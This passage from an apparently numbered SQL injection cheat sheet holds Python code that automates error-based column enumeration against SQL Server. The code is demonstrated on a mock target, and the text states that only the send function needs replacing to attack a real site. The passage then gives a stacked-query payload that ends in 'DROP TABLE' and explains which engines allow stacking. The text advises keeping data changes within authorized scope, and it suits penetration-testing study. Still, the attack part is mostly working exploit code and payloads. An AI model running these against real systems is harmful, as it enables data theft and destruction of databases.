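    not_in = ", ".join(f"'{c}'" for c in seen) or "''"
    return (f"SELECT TOP 1 column_name FROM INFORMATION_SCHEMA.COLUMNS "
            f"WHERE table_name='{table}' AND column_name NOT IN ({not_in})")


def parse_response(body: str):
    """Return the leaked value, None when no error came back, and raise when
    the subquery was not scalar (the mistake in the bare 1=(SELECT ...) form)."""
    m = CONVERSION_RE.search(body)
    if m:
        return m.group(1)
    if MULTI_ROW in body:
        raise ValueError("subquery returned several rows: add TOP 1 / NOT IN")
    return None


def enumerate_columns(send, table: str, limit: int = 50) -> list:
    seen = []
    for _ in range(limit):
        value = parse_response(send(convert_payload(next_column_subquery(table, seen))))
        if value is None:             # no error: NOT IN has excluded every column
            break
        seen.append(value)
    return seen


class FakeTarget:
    """Constructed stand-in for the vulnerable page; not a SQL engine."""
    COLUMNS = {"users": ["id", "username", "password_hash", "email"]}

    def __init__(self, nvarchar: bool = True):
        self.kind = "nvarchar" if nvarchar else "varchar"

    def send(self, payload: str) -> str:
        m = re.search(r"table_name='(\w+)'", payload)
        cols = list(self.COLUMNS.get(m.group(1), [])) if m else []
        excluded = (re.findall(r"'(\w*)'", payload.split("NOT IN", 1)[1])
                    if "NOT IN" in payload else [])
        remaining = [c for c in cols if c not in excluded]
        if not remaining:
            return "<html>0 results</html>"
        if "TOP 1" not in payload and len(remaining) > 1:
            return f"<html>Error: {MULTI_ROW}.</html>"
        return (f"<html>Error: Conversion failed when converting the {self.kind} "
                f"value '{remaining[0]}' to data type int.</html>")


if __name__ == "__main__":
    print(enumerate_columns(FakeTarget().send, "users"))
    # ['id', 'username', 'password_hash', 'email']
```

Replacing `FakeTarget.send` with a function that submits the payload in the vulnerable parameter and returns the response body is the only change needed against a real target; the loop, the `NOT IN` bookkeeping and the regular expression stay the same, and `convert_payload("SELECT @@version")` produces the version-fingerprint payload from 2.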

25. Advanced UNION-Based SQL Injection with Stacking Queries:

description:
Comb a UNION that reads data with a second, stacked statement that changes
state in the same request. The `;` ends the application's statement, so any
complete statement can follow it.

payload:
' UNION SELECT column1, column2 FROM another_table; DROP TABLE target_table --

tactics:
Stacks queries to execute multiple operations. Stacking is a property of the
driver and the database, not of SQL: SQL Server and PostgreSQL usually allow
it, MySQL only when the client library enabled multi-statement execution,
Python's `sqlite3` `execute()` refuses a second statement, and Oracle does
not support it in this form.
Be cautious with destructive actions like `DROP TABLE`. On an engagement,
prove the capability with a harmless statement (`SELECT 1`, or a delay as in
16) and keep data changes out of scope unless they are explicitly authorized.
---X---
